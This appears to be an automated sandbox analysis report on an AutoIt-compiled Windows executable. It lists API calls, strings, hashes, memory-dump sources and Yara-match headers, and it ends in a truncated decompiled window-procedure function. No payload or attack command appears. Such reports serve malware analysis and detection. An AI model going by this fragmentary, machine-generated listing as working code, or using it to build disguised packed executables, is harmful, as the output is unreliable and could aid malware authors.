                                          • Instruction ID: 50f00f5cbd40bca4f586f087b2f9392259a69fc79f8685ffb2499d1a8018bf97
                                          • Opcode Fuzzy Hash: b4cb991a97c7cc7feeddedc55a74ccebd4bf16c7ced93c7e79149a7717f1e74f
                                          • Instruction Fuzzy Hash: 4F81BBB2901B40CFD398DF2AA8456597BE5FB88306760952ED02EEB275F7F044C98F21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: 2f51ddcc81eb6f1bc48968cb87e3ab9492d9eb7c87ad83491a8452b59291cd31
                                          • Instruction ID: 3117b5c9f579ea57086c8ef66c240567f11327a21be1897e900c111915682f1e
                                          • Opcode Fuzzy Hash: 2f51ddcc81eb6f1bc48968cb87e3ab9492d9eb7c87ad83491a8452b59291cd31
                                          • Instruction Fuzzy Hash: BDF03A729002D47EEA3097236C0DE2B2E7DD7C6F50F00002EFA08B2271C6A10884DAB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DB4EE5: _fseek.LIBCMT ref: 00DB4EFD
                                            • Part of subcall function 00E19734: _wcscmp.LIBCMT ref: 00E19824
                                            • Part of subcall function 00E19734: _wcscmp.LIBCMT ref: 00E19837
                                          • _malloc.LIBCMT ref: 00E19656
                                          • _malloc.LIBCMT ref: 00E19660
                                          • _free.LIBCMT ref: 00E196A2
                                          • _free.LIBCMT ref: 00E196A9
                                          • _free.LIBCMT ref: 00E19714
                                            • Part of subcall function 00DD2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00DD9A24), ref: 00DD2D69
                                            • Part of subcall function 00DD2D55: GetLastError.KERNEL32(00000000,?,00DD9A24), ref: 00DD2D7B
                                          • _free.LIBCMT ref: 00E1971C
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _free$_malloc_wcscmp$ErrorFreeHeapLast_fseek
                                          • String ID:
                                          • API String ID: 2231465579-0
                                          • Opcode ID: 4074a69616a68aec4c23e3aa82ff7b4de26f84618e71ce6bc5783e8a9c299837
                                          • Instruction ID: 15df2e2fa5028d0efd9853a84386793ed1fc07ddd77778a239ee8a9c057d1be0
                                          • Opcode Fuzzy Hash: 4074a69616a68aec4c23e3aa82ff7b4de26f84618e71ce6bc5783e8a9c299837
                                          • Instruction Fuzzy Hash: 87512FB1904258ABDF25DF64DC81AEEBBB9EF48300F10449EB509A7352DB715A90CF68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DB4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DB4E0F
                                          • _free.LIBCMT ref: 00DEE263
                                          • _free.LIBCMT ref: 00DEE2AA
                                            • Part of subcall function 00DB6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00DB6BAD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                          • API String ID: 2861923089-1757145024
                                          • Opcode ID: 9335edc3615001e134ee978c0a50bbb76766e9ccacd7c81a311d5e30b1210b70
                                          • Instruction ID: e1a0f989a0d3313784f599d3dcc74154bf8b1ca744ddae2442aa2e1ff7d49854
                                          • Opcode Fuzzy Hash: 9335edc3615001e134ee978c0a50bbb76766e9ccacd7c81a311d5e30b1210b70
                                          • Instruction Fuzzy Hash: 70917871900259EFCF14EFA5D8819EDBBB8FF19310F14452AF816AB2A1DB70A945CB70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00DB35A1,SwapMouseButtons,00000004,?), ref: 00DB35D4
                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00DB35A1,SwapMouseButtons,00000004,?,?,?,?,00DB2754), ref: 00DB35F5
                                          • RegCloseKey.KERNEL32(00000000,?,?,00DB35A1,SwapMouseButtons,00000004,?,?,?,?,00DB2754), ref: 00DB3617
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 3677997916-824357125
                                          • Opcode ID: 849f746deca79a02ef6e8e18ffd08050142853fdac17c948a79726fe13954405
                                          • Instruction ID: 6dac5da2cff3517745fdec884732f368075f8cef5dd52361ce6cfd758ce2441f
                                          • Opcode Fuzzy Hash: 849f746deca79a02ef6e8e18ffd08050142853fdac17c948a79726fe13954405
                                          • Instruction Fuzzy Hash: 631148B5910208FFDB208F69DC84AEEBBB8EF04740F005469E806E7210D2719E44AB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _memset.LIBCMT ref: 00DB44CF
                                            • Part of subcall function 00DB407C: _memset.LIBCMT ref: 00DB40FC
                                            • Part of subcall function 00DB407C: _wcscpy.LIBCMT ref: 00DB4150
                                            • Part of subcall function 00DB407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DB4160
                                          • KillTimer.USER32(?,00000001,?,?), ref: 00DB4524
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DB4533
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DED4B9
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                          • String ID:
                                          • API String ID: 1378193009-0
                                          • Opcode ID: 1b600ad6dbfb953307196740fabe026f82b8975cd3d0e6cebda837528d610f9a
                                          • Instruction ID: 78e6697eb3061772fcd2ff36e07342760612d092a94daefe01c5d3e70007690b
                                          • Opcode Fuzzy Hash: 1b600ad6dbfb953307196740fabe026f82b8975cd3d0e6cebda837528d610f9a
                                          • Instruction Fuzzy Hash: 6D21D770904B889FE732DB258859BE6BBEC9F15314F08009EE6DE56182C7746988CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE
                                          • _memmove.LIBCMT ref: 00DB4CBA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _malloc_memmove
                                          • String ID: AU3!P/$EA06
                                          • API String ID: 1183979061-182974850
                                          • Opcode ID: cc957d0046c0a7a72c84518cb7cbc38569ff9a8e6b5f8014a0734992c8a71d26
                                          • Instruction ID: f0ace6e066d30fc8d5124d109b0098c2c2ee8f23ba296f6334f2eb26bcce4985
                                          • Opcode Fuzzy Hash: cc957d0046c0a7a72c84518cb7cbc38569ff9a8e6b5f8014a0734992c8a71d26
                                          • Instruction Fuzzy Hash: 0E411822A04158EBDF21DB64C8A17FE7FA6DB45310F6C4465EC87AB287DA20DD4483B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _memset.LIBCMT ref: 00DEEA39
                                          • GetOpenFileNameW.COMDLG32(?), ref: 00DEEA83
                                            • Part of subcall function 00DB4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DB4743,?,?,?,00DB715A,?,?,?,?,00DB108C), ref: 00DB4770
                                            • Part of subcall function 00DD0791: GetLongPathNameW.KERNEL32 ref: 00DD07B0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Name$Path$FileFullLongOpen_memset
                                          • String ID: X
                                          • API String ID: 3777226403-3081909835
                                          • Opcode ID: 57933ab86acde9128bceb6b0641489d99eb9ede3d373c8bf68e9fc532686211d
                                          • Instruction ID: a09532a13f9e38fab8d74556fe343a8cb2958d401181a9022b98d53256335f3e
                                          • Opcode Fuzzy Hash: 57933ab86acde9128bceb6b0641489d99eb9ede3d373c8bf68e9fc532686211d
                                          • Instruction Fuzzy Hash: FC21C331A002889BCB01DF95D845BEE7BF9EF88314F00405AE449BB241DFB49989CFB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DB3C14,00E752F8,?,?,?), ref: 00DC096E
                                            • Part of subcall function 00DB7BCC: _memmove.LIBCMT ref: 00DB7C06
                                          • _wcscat.LIBCMT ref: 00DF4CB7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: FullNamePath_memmove_wcscat
                                          • String ID: S
                                          • API String ID: 257928180-3334745618

                                          APIs
                                          • _malloc.LIBCMT ref: 00DD0DCE
                                            • Part of subcall function 00DD571C: __FF_MSGBANNER.LIBCMT ref: 00DD5733
                                            • Part of subcall function 00DD571C: __NMSG_WRITE.LIBCMT ref: 00DD573A
                                            • Part of subcall function 00DD571C: RtlAllocateHeap.NTDLL(01550000,00000000,00000001,00000000,?,?,?,00DD0DD3,?), ref: 00DD575F
                                          • std::exception::exception.LIBCMT ref: 00DD0DEC
                                          • __CxxThrowException@8.LIBCMT ref: 00DD0E01
                                            • Part of subcall function 00DD859B: RaiseException.KERNEL32(?,?,?,00E69E78,00000000,?,?,?,?,00DD0E06,?,00E69E78,?,00000001), ref: 00DD85F0
                                            • Part of subcall function 00DD84D1: _free.LIBCMT ref: 00DD857E
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: AllocateExceptionException@8HeapRaiseThrow_free_mallocstd::exception::exception
                                          • String ID:
                                          • API String ID: 3712093317-0

                                          APIs
                                          • _malloc.LIBCMT ref: 00E189B3
                                            • Part of subcall function 00DD571C: __FF_MSGBANNER.LIBCMT ref: 00DD5733
                                            • Part of subcall function 00DD571C: __NMSG_WRITE.LIBCMT ref: 00DD573A
                                            • Part of subcall function 00DD571C: RtlAllocateHeap.NTDLL(01550000,00000000,00000001,00000000,?,?,?,00DD0DD3,?), ref: 00DD575F
                                          • _malloc.LIBCMT ref: 00E189C7
                                          • _malloc.LIBCMT ref: 00E189DB
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: _malloc$AllocateHeap
                                          • String ID:
                                          • API String ID: 680241177-0

                                          APIs
                                          • _free.LIBCMT ref: 00E18D1B
                                            • Part of subcall function 00DD2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00DD9A24), ref: 00DD2D69
                                            • Part of subcall function 00DD2D55: GetLastError.KERNEL32(00000000,?,00DD9A24), ref: 00DD2D7B
                                          • _free.LIBCMT ref: 00E18D2C
                                          • _free.LIBCMT ref: 00E18D3E
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0

                                          APIs
                                          • _memmove.LIBCMT ref: 00E16331
                                          • _memmove.LIBCMT ref: 00E1634F
                                            • Part of subcall function 00E164B8: _memmove.LIBCMT ref: 00E16546
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0

                                          APIs
                                          • _memmove.LIBCMT ref: 00E178DB
                                            • Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: _malloc_memmove
                                          • String ID:
                                          • API String ID: 1183979061-0

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0

                                          APIs
                                          • IsThemeActive.UXTHEME ref: 00DB4834
                                            • Part of subcall function 00DD336C: __lock.LIBCMT ref: 00DD3372
                                            • Part of subcall function 00DD336C: DecodePointer.KERNEL32(00000001,?,00DB4849,00E07C74), ref: 00DD337E
                                            • Part of subcall function 00DD336C: EncodePointer.KERNEL32(?,?,00DB4849,00E07C74), ref: 00DD3389
                                            • Part of subcall function 00DB48FD: SystemParametersInfoW.USER32 ref: 00DB4915
                                            • Part of subcall function 00DB48FD: SystemParametersInfoW.USER32 ref: 00DB492A
                                            • Part of subcall function 00DB3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DB3B68
                                            • Part of subcall function 00DB3B3A: IsDebuggerPresent.KERNEL32 ref: 00DB3B7A
                                            • Part of subcall function 00DB3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E752F8,00E752E0,?,?), ref: 00DB3BEB
                                            • Part of subcall function 00DB3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00DB3C6F
                                          • SystemParametersInfoW.USER32 ref: 00DB4874
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                          • String ID:
                                          • API String ID: 1438897964-0

                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00DB5821,?,?,?,?), ref: 00DB5CC7
                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00DB5821,?,?,?,?), ref: 00DEDD73
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0

                                          APIs
                                            • Part of subcall function 00DD8B28: __getptd_noexit.LIBCMT ref: 00DD8B28
                                          • __lock_file.LIBCMT ref: 00DD53EB
                                            • Part of subcall function 00DD6C11: __lock.LIBCMT ref: 00DD6C34
                                          • __fclose_nolock.LIBCMT ref: 00DD53F6
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                          • String ID:
                                          • API String ID: 2800547568-0

                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000001,00000000,00000000,?,?,?,00DB5474,?,?,?,?,?), ref: 00DB77F0
                                            • Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000001,00000000,?,?,?,00DB5474,?,?,?,?,?), ref: 00DB7820
                                            • Part of subcall function 00DB774D: _memmove.LIBCMT ref: 00DB7789
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWide$_malloc_memmove
                                          • String ID:
                                          • API String ID: 961785871-0

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0

                                          APIs
                                          • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00DB5B96
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0

                                          APIs
                                          Similarity
                                          • API ID: _memmove

                                          APIs
                                            • Part of subcall function 00DB4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00DB4BEF
                                            • Part of subcall function 00DD525B: __wfsopen.LIBCMT ref: 00DD5266
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DB4E0F
                                            • Part of subcall function 00DB4B6A: FreeLibrary.KERNEL32(00000000), ref: 00DB4BA4
                                            • Part of subcall function 00DB4C70: _memmove.LIBCMT ref: 00DB4CBA
                                          Similarity
                                          • API ID: Library$Free$Load__wfsopen_memmove

                                          APIs
                                          • IsWindow.USER32(00000000), ref: 00DF0C2A
                                          Similarity
                                          • API ID: Window

                                          APIs
                                          • ReadFile.KERNEL32(?,?,00010000,?,00000000,00000000,?,00010000,?,00DB56A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00DB5C16
                                          Similarity
                                          • API ID: FileRead

                                          APIs
                                          Similarity
                                          • API ID: _memmove

                                          APIs
                                            • Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE
                                          • _memmove.LIBCMT ref: 00E0F778
                                          Similarity
                                          • API ID: _malloc_memmove

                                          APIs
                                            • Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE
                                            • Part of subcall function 00DD0DB6: std::exception::exception.LIBCMT ref: 00DD0DEC
                                            • Part of subcall function 00DD0DB6: __CxxThrowException@8.LIBCMT ref: 00DD0E01
                                          • _memset.LIBCMT ref: 00E176F9
                                          Similarity
                                          • API ID: Exception@8Throw_malloc_memsetstd::exception::exception

                                          APIs
                                            • Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE
                                          • CharUpperBuffW.USER32(00000000,?,00000000,00000048,-00000003,?,00DC3E69,?,?,?,-00000003,00000000,00000000), ref: 00DB8280
                                          Similarity
                                          • API ID: BuffCharUpper_malloc

                                          APIs
                                          • FreeLibrary.KERNEL32(?,?,00E752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DB4E7E
                                          Similarity
                                          • API ID: FreeLibrary

                                          APIs
                                          • GetLongPathNameW.KERNEL32 ref: 00DD07B0
                                            • Part of subcall function 00DB7BCC: _memmove.LIBCMT ref: 00DB7C06
                                          Similarity
                                          • API ID: LongNamePath_memmove

                                          APIs
                                            • Part of subcall function 00E13359: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,?,?,00E13466,?,?,?,00DEDC37,00E655C0,00000002,?,?), ref: 00E133D7
                                          • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,?,00DEDC37,00E655C0,00000002,?,?,?,?), ref: 00E13474
                                          Similarity
                                          • API ID: File$PointerWrite

                                          APIs
                                          • FindCloseChangeNotification.KERNEL32(?,?,?,00DB57C1,?,00DB6AD7), ref: 00DB5C8F
                                          Similarity
                                          • API ID: ChangeCloseFindNotification

                                          APIs
                                          • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,00DEDD42,?,?,00000000), ref: 00DB5C5F
                                          Similarity
                                          • API ID: FilePointer

                                          APIs
                                            • Part of subcall function 00DD3217: __lock.LIBCMT ref: 00DD3219
                                          • __onexit_nolock.LIBCMT ref: 00DD2C60
                                            • Part of subcall function 00DD2C88: RtlDecodePointer.NTDLL(?,?,?,?,?,00DD2C65,?,00E69ED0,0000000C,00DD2D4B,?,?,00DB1014,00DEB559), ref: 00DD2C9B
                                            • Part of subcall function 00DD2C88: DecodePointer.KERNEL32(?,?,?,?,?,00DD2C65,?,00E69ED0,0000000C,00DD2D4B,?,?,00DB1014,00DEB559), ref: 00DD2CA6
                                            • Part of subcall function 00DD2C88: __realloc_crt.LIBCMT ref: 00DD2CE7
                                            • Part of subcall function 00DD2C88: __realloc_crt.LIBCMT ref: 00DD2CFB
                                            • Part of subcall function 00DD2C88: EncodePointer.KERNEL32(00000000,?,?,?,?,?,00DD2C65,?,00E69ED0,0000000C,00DD2D4B,?,?,00DB1014,00DEB559), ref: 00DD2D0D
                                            • Part of subcall function 00DD2C88: EncodePointer.KERNEL32(?,?,?,?,?,?,00DD2C65,?,00E69ED0,0000000C,00DD2D4B,?,?,00DB1014,00DEB559), ref: 00DD2D1B
                                            • Part of subcall function 00DD2C88: EncodePointer.KERNEL32(00000000,?,?,?,?,?,00DD2C65,?,00E69ED0,0000000C,00DD2D4B,?,?,00DB1014,00DEB559), ref: 00DD2D27
                                          Similarity
                                          • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock

                                          APIs
                                          Similarity
                                          • API ID: __wfsopen

                                          Non-executed Functions

                                          C-Code - Quality: 90%
                                          			E00E3CABC(void* __ebx, struct HWND__* _a4, int _a8, long _a12) {
                                          				intOrPtr _v24;
                                          				long _v52;
                                          				void* _v56;
                                          				intOrPtr _v60;
                                          				intOrPtr _v84;
                                          				long _v92;
                                          				void* _v96;
                                          				signed int _v108;
                                          				int _v112;
                                          				void* _v116;
                                          				struct HWND__** _v120;
                                          				intOrPtr _v124;
                                          				long _v128;
                                          				signed int _v132;
                                          				int _v136;
                                          				void* _v140;
                                          				signed int _v144;
                                          				struct HWND__* _v148;
                                          				struct tagPOINT _v156;
                                          				struct tagPOINT _v164;
                                          				signed int _v165;
                                          				signed int _v168;
                                          				signed int _v172;
                                          				long _v176;
                                          				void* __edi;
                                          				signed int _t218;
                                          				long _t220;
                                          				signed int _t221;
                                          				long _t222;
                                          				intOrPtr _t224;
                                          				signed int _t226;
                                          				signed int _t227;
                                          				signed int _t230;
                                          				intOrPtr _t231;
                                          				signed int _t234;
                                          				intOrPtr _t237;
                                          				signed int _t240;
                                          				intOrPtr _t242;
                                          				intOrPtr _t249;
                                          				intOrPtr _t252;
                                          				signed int _t256;
                                          				intOrPtr _t259;
                                          				signed int _t269;
                                          				intOrPtr _t271;
                                          				intOrPtr _t273;
                                          				long _t277;
                                          				intOrPtr _t280;
                                          				signed int _t286;
                                          				signed int _t289;
                                          				intOrPtr _t291;
                                          				signed int _t293;
                                          				signed int _t301;
                                          				intOrPtr _t304;
                                          				signed int _t308;
                                          				long _t316;
                                          				signed int _t339;
                                          				intOrPtr _t340;
                                          				intOrPtr _t345;
                                          				intOrPtr _t350;
                                          				signed int _t355;
                                          				signed int _t357;
                                          				short _t359;
                                          				short _t360;
                                          				short _t362;
                                          				signed int _t364;
                                          				struct HWND__* _t371;
                                          				signed int _t372;
                                          				long _t373;
                                          				intOrPtr _t379;
                                          				intOrPtr _t382;
                                          				intOrPtr _t383;
                                          				intOrPtr _t385;
                                          				long _t388;
                                          				struct HMENU__* _t390;
                                          				signed int _t392;
                                          				struct HMENU__* _t394;
                                          				signed int _t396;
                                          				intOrPtr _t400;
                                          				signed int _t413;
                                          				void* _t414;
                                          				intOrPtr _t415;
                                          				intOrPtr _t416;
                                          				long _t418;
                                          				intOrPtr _t421;
                                          				signed int _t424;
                                          				struct tagPOINT* _t434;
                                          				intOrPtr _t435;
                                          				int _t436;
                                          				long _t438;
                                          				signed int _t439;
                                          				intOrPtr _t440;
                                          				void* _t445;
                                          				void* _t446;
                                          
                                          				_t218 = E00DB2612(0xe757b0, _a4);
                                          				_t379 =  *0xe75810; // 0x0
                                          				_t418 = _a12;
                                          				_v156.y = _t218;
                                          				_t421 =  *((intOrPtr*)( *((intOrPtr*)(_t379 + _t218 * 4))));
                                          				_t220 =  *(_t418 + 8);
                                          				_v124 = _t421;
                                          				_t445 = _t220 - 0xfffffe6e;
                                          				if(_t445 > 0) {
                                          					__eflags = _t220 - 0xfffffff0;
                                          					if(__eflags > 0) {
                                          						__eflags = _t220 - 0xfffffff4;
                                          						if(_t220 == 0xfffffff4) {
                                          							_t221 = E00DB25DB(0xe757b0,  *_t418);
                                          							_v168 = _t221;
                                          							__eflags = _t221 - 0xffffffff;
                                          							if(_t221 == 0xffffffff) {
                                          								L8:
                                          								_t222 = DefDlgProcW(_a4, 0x4e, _a8, _t418);
                                          								L9:
                                          								return _t222;
                                          							}
                                          							_t382 =  *0xe75824; // 0x1569100
                                          							_t383 =  *((intOrPtr*)( *((intOrPtr*)(_t382 + _t221 * 4))));
                                          							_t224 =  *((intOrPtr*)(_t383 + 0x90));
                                          							__eflags = _t224 - 0x10;
                                          							if(_t224 == 0x10) {
                                          								L100:
                                          								_t226 =  *((intOrPtr*)(_t418 + 0xc)) - 1;
                                          								__eflags = _t226;
                                          								if(_t226 == 0) {
                                          									_t222 = 0x20;
                                          									goto L9;
                                          								}
                                          								_t227 = _t226 - 0x10000;
                                          								__eflags = _t227;
                                          								if(_t227 != 0) {
                                          									goto L8;
                                          								}
                                          								__eflags =  *((intOrPtr*)(_t383 + 0x48)) - 0xfe000000;
                                          								_v165 = _t227;
                                          								if( *((intOrPtr*)(_t383 + 0x48)) == 0xfe000000) {
                                          									_v165 = 1;
                                          								}
                                          								_t230 = E00DB2402(0xe757b0,  *((intOrPtr*)(_t418 + 0x2c)),  &_v148,  &_v164);
                                          								__eflags = _t230;
                                          								if(_t230 != 0) {
                                          									_t231 =  *0xe75824; // 0x1569100
                                          									_t424 = _v164.x;
                                          									_t234 = GetWindowLongW( *( *((intOrPtr*)( *((intOrPtr*)(_t231 + _t424 * 4)))) + 0x34), 0xfffffff0);
                                          									__eflags = _t234 & 0x08000000;
                                          									if((_t234 & 0x08000000) != 0) {
